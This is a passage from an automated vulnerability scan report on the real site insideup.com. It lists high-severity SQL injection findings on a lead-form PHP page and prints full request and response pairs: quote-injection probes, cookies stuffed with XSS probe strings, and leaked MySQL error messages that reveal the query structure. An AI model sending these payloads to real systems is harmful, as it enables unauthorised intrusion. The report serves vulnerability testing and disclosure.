OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 535

subcategoryId=80006&catId=80006&iusrc=iupsc+&attributeId_423[]=2758__Other&attributeId_424=2763__Other&attributeId_425=2766__No+-+We+will+need+to+obtain+a+list+of+addresses&attributeId_426=2773__500%2
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:27:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n3j65p8gdub6e548g3ahnitup4; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project_dynamic_page_updated.php was not found on this server.</p>

1.281. http://www.insideup.com/ppc/leadflow/fist00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php'?catId=10003&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:31:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pp4fbdqghhd9p0t681edh0kb85; path=/
Content-Length: 2222
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/fist00/project.php'?catId=10003&iusrc=iupsc' OR prj.project_page_url = 'leadflow/fist00/project.php'?catId=10003&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=10003&iusrc=iupsc' OR prj.project_page_url = 'leadflow/fist00/project.php' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php''?catId=10003&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 04:31:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q80b41vt41gt9quh0cq79je907; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/fist00/project.php'' was not found on this server.</p>

1.282. http://www.insideup.com/ppc/leadflow/fist00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:57:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0nf066ktdtd4p2d976dba7r9r7; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2936__Financial statement creation&attributeId_453=2944__No - No preference&a' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 